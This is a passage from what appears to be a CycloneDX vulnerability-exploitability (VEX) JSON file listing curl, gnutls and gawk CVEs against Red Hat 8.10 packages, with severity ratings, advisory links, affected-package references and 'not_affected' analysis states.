      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3784"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3784"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5q3w-6p3j-mw6p"
        },
        {
          "url": "https://hackerone.com/reports/3584903"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3784.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3784"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3832",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        179
      ],
      "description": "A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3832"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20612"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20613"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26319"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26409"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:29197"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3832"
        },
        {
          "url": "https://bugzilla.redhat.com/2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445762"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467441"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467451"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467678"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467686"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33845"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33846"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3832"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3833"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42009"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42015"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5260"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5419"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-20613.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20612"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/issues/1801"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3832.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50346.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3832"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8284-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3832"
        },
        {
          "url": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2026-04-29-12"
        }
      ],
      "published": "2026-04-30T18:16:30+00:00",
      "updated": "2026-07-13T17:17:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.16-8.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40467",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Use After Free vulnerability has been found in \"io.c\" program file of gawk (do_getline_redir() routine). This issue may lead to a crash. It affects\u00a0gawk in versions 5.4.0 and below.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40467"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40467"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-40467"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gawk.git/commit/?id=a2d18c74109e41bec29a23098eba2e00057286d8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40467"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8588-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40467"
        }
      ],
      "published": "2026-07-13T13:16:36+00:00",
      "updated": "2026-07-14T01:13:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability has been found in \"builtin.c\" program file of gawk. This issue may lead to memory exhaustion on the hosting operating system and could be used to overwrite gawk heap metadata and objects with attacker-controlled bytes. It affects\u00a0gawk in versions 5.4.0 and below.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40468"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-40467"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gawk.git/commit/?id=062f2f2581b991362c046f7f2e238ffa34e6f8c7"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8588-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40468"
        }
      ],
      "published": "2026-07-13T13:16:36+00:00",
      "updated": "2026-07-14T01:12:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
